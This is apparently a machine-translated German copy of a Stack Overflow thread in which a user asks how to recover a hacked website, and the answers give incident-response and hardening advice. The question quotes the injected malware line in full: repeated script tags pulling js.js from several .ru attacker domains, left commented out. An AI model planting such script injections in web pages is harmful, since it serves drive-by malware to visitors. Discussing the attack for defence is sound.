Meine Website wurde gehackt.Was soll ich machen?[geschlossen]
https://stackoverflow.com/questions/2970
italiano
english
français
española
中国
日本の
العربية
Deutsch
한국어
Português
RussianFrage
Mein Vater hat mich heute angerufen und gesagt, dass die Leute, die seine Website besuchen, 168 Viren bekommen, die versuchen, sie auf ihren Computer herunterzuladen.Er ist überhaupt nicht technisch versiert und hat das Ganze mit einem WYSIWYG-Editor erstellt.
Ich öffnete seine Website und schaute mir die Quelle an, und am Ende der Quelle befand sich direkt vor dem schließenden HTML-Tag eine Zeile mit Javascript-Includes.Sie haben diese Datei (neben vielen anderen) beigefügt: http://www.98hs.ru/js.js <-- SCHALTEN SIE JAVASCRIPT AUS, BEVOR SIE ZU DIESER URL GEHEN.
Deshalb habe ich es vorerst auskommentiert.Es stellte sich heraus, dass sein FTP-Passwort ein einfaches Wörterbuchwort mit sechs Buchstaben war. Wir gehen also davon aus, dass es auf diese Weise gehackt wurde.Wir haben sein Passwort in eine 8+-stellige Nicht-Wort-Zeichenfolge geändert (er würde sich nicht für eine Passphrase entscheiden, da er ein „Jagd-n-Peck“-Schreiber ist).
Ich habe ein whois auf 98hs.ru und habe herausgefunden, dass es von einem Server in Chile gehostet wird.Es ist tatsächlich auch eine E-Mail-Adresse damit verknüpft, aber ich bezweifle ernsthaft, dass diese Person der Täter ist.Wahrscheinlich war es nur eine andere Seite, die gehackt wurde ...
Ich habe jedoch keine Ahnung, was ich an dieser Stelle tun soll, da ich mich noch nie zuvor mit so etwas befasst habe.Hat jemand Vorschläge?
Er nutzte einfaches, ungesichertes Jane-FTP über webhost4life.com.Ich sehe nicht einmal einen Weg dazu Tun sftp auf ihrer Website.Ich glaube, sein Benutzername und sein Passwort wurden abgefangen?
Um dies für die Community relevanter zu machen: Welche Schritte/Best Practices sollten Sie befolgen, um Ihre Website vor Hackerangriffen zu schützen?
Fürs Protokoll, hier ist die Codezeile, die „auf magische Weise“ zu seiner Datei hinzugefügt wurde (und nicht in seiner Datei auf seinem Computer ist – ich habe sie auskommentiert gelassen, nur um absolut sicherzugehen, dass sie nichts bewirkt auf dieser Seite, obwohl ich sicher bin, dass Jeff sich davor hüten würde):
<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script-->
Lösung
Versuchen Sie, so viele Informationen wie möglich zu sammeln.Sehen Sie nach, ob der Host Ihnen ein Protokoll mit allen FTP-Verbindungen geben kann, die zu Ihrem Konto hergestellt wurden.Anhand dieser können Sie erkennen, ob es sich überhaupt um eine FTP-Verbindung handelte, über die die Änderung vorgenommen wurde, und möglicherweise eine IP-Adresse erhalten.
Wenn Sie eine vorgefertigte Software wie Wordpress, Drupal oder etwas anderes verwenden, das Sie nicht codiert haben, kann es im Upload-Code zu Schwachstellen kommen, die diese Art von Änderung ermöglichen.Wenn es sich um eine benutzerdefinierte Erstellung handelt, überprüfen Sie noch einmal alle Stellen, an denen Sie Benutzern erlauben, Dateien hochzuladen oder vorhandene Dateien zu ändern.
Die zweite Möglichkeit wäre, einen Dump der Site im Ist-Zustand zu erstellen und alles auf andere Änderungen zu überprüfen.Es ist vielleicht nur eine einzige Änderung, die sie vorgenommen haben, aber wenn sie über FTP reingekommen sind, wer weiß, was sonst noch da oben ist.
Versetzen Sie Ihre Website wieder in einen bekanntermaßen guten Zustand und führen Sie bei Bedarf ein Upgrade auf die neueste Version durch.
Es gibt auch eine Höhe der Rendite, die Sie berücksichtigen müssen.Ist der Schaden einen Versuch wert, die Person aufzuspüren, oder lebt man hier einfach nur, lernt und verwendet stärkere Passwörter?
Andere Tipps
Ich weiß, das ist etwas spät im Spiel, aber die für das JavaScript genannte URL wird in einer Liste von Websites erwähnt, von denen bekannt ist, dass sie Teil des ASPRox-Bot-Wiederauflebens waren, das im Juni begann (zumindest wurden wir damals darauf hingewiesen). Es).Einige Details dazu sind unten aufgeführt:
http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx
Das Schlimme daran ist, dass praktisch jedes Feld vom Typ Varchar in der Datenbank „infiziert“ wird, um einen Verweis auf diese URL auszuspucken, in der der Browser einen winzigen Iframe erhält, der ihn in einen Bot verwandelt.Eine grundlegende SQL-Lösung hierfür finden Sie hier:
http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx
Das Erschreckende daran ist jedoch, dass der Virus in den Systemtabellen nach zu infizierenden Werten sucht und viele Shared-Hosting-Pläne auch den Datenbankspeicher für ihre Clients freigeben.Höchstwahrscheinlich war also nicht einmal die Website Ihres Vaters infiziert, sondern die Website eines anderen innerhalb seines Hosting-Clusters, die schlechten Code schrieb und den SQL-Injection-Angriff Tür und Tor öffnete.
Wenn er dies noch nicht getan hat, würde ich eine DRINGENDE E-Mail an ihren Host senden und ihnen einen Link zu diesem SQL-Code geben, um das gesamte System zu reparieren.Sie können Ihre eigenen betroffenen Datenbanktabellen reparieren, aber höchstwahrscheinlich werden die Bots, die die Infektion verursachen, erneut durch diese Lücke dringen und die gesamte Datenbank infizieren.
Hoffentlich erhalten Sie dadurch weitere Informationen, mit denen Sie arbeiten können.
BEARBEITEN:Noch ein kurzer Gedanke: Wenn er zum Erstellen seiner Website eines der Online-Designtools des Hosts verwendet, befindet sich der gesamte Inhalt wahrscheinlich in einer Spalte und wurde auf diese Weise infiziert.
Sie erwähnen, dass Ihr Vater ein Website-Publishing-Tool verwendet hat.
Wenn das Veröffentlichungstool von seinem Computer auf dem Server veröffentlicht, sind seine lokalen Dateien möglicherweise sauber und er muss sie lediglich erneut auf dem Server veröffentlichen.
Er sollte jedoch prüfen, ob es eine andere Anmeldemethode für seinen Server als einfaches FTP gibt ...Das ist nicht sehr sicher, da sein Passwort im Klartext über das Internet gesendet wird.
Mit einem aus sechs Wörtern bestehenden Passwort wurde er möglicherweise brutal erzwungen.Das ist wahrscheinlicher, als dass sein FTP abgefangen wird, aber es könnte auch so sein.
Beginnen Sie mit einem stärkeren Passwort.(8 Zeichen sind immer noch ziemlich schwach)
Sehen Sie, ob dieser Link zu einem Internet führt Sicherheitsblog ist hilfreich.
Ist die Website nur statisches HTML?d.h.Er hat es nicht geschafft, sich selbst eine Upload-Seite zu programmieren, die es jedem, der vorbeifährt, erlaubt, kompromittierte Skripte/Seiten hochzuladen?
Warum fragen Sie nicht webhost4life, ob FTP-Protokolle verfügbar sind, und melden Sie ihnen das Problem?Man weiß ja nie, vielleicht sind sie sehr aufgeschlossen und finden für Sie genau heraus, was passiert ist?
Ich arbeite für einen Shared-Hoster und wir freuen uns immer über Berichte wie diese und können in der Regel den genauen Angriffsvektor lokalisieren und Hinweise geben, wo der Kunde einen Fehler gemacht hat.
Trennen Sie den Webserver, ohne ihn herunterzufahren, um Skripte zum Herunterfahren zu vermeiden.Analysieren Sie die Festplatte über einen anderen Computer als Datenlaufwerk und prüfen Sie, ob Sie den Schuldigen anhand von Protokolldateien und dergleichen ermitteln können.Stellen Sie sicher, dass der Code sicher ist, und stellen Sie ihn dann aus einer Sicherung wieder her.
Dies ist kürzlich einem meiner Kunden passiert, der auf ipower gehostet wurde.Ich bin mir nicht sicher, ob Ihre Hosting-Umgebung auf Apache basiert, aber wenn ja, achten Sie darauf, noch einmal nach .htaccess-Dateien zu suchen, die Sie nicht erstellt haben, insbesondere oberhalb des Webroots und innerhalb von Image-Verzeichnissen, da diese dazu neigen, dort einige Unannehmlichkeiten hervorzurufen auch (sie leiteten die Leute um, je nachdem, woher sie in der Empfehlung kamen).Überprüfen Sie auch den Code, den Sie erstellt haben, auf Code, den Sie nicht geschrieben haben.
Anscheinend wurden wir von denselben Leuten gehackt!Oder Bots, in unserem Fall.Sie verwendeten SQL-Injection in der URL auf einigen alten klassischen ASP-Sites, die niemand mehr pflegt.Wir haben angreifende IPs gefunden und sie in IIS blockiert.Jetzt müssen wir alle alten ASP umgestalten.Mein Rat ist daher, zunächst einen Blick auf die IIS-Protokolle zu werfen, um herauszufinden, ob das Problem im Code oder in der Serverkonfiguration Ihrer Site liegt.
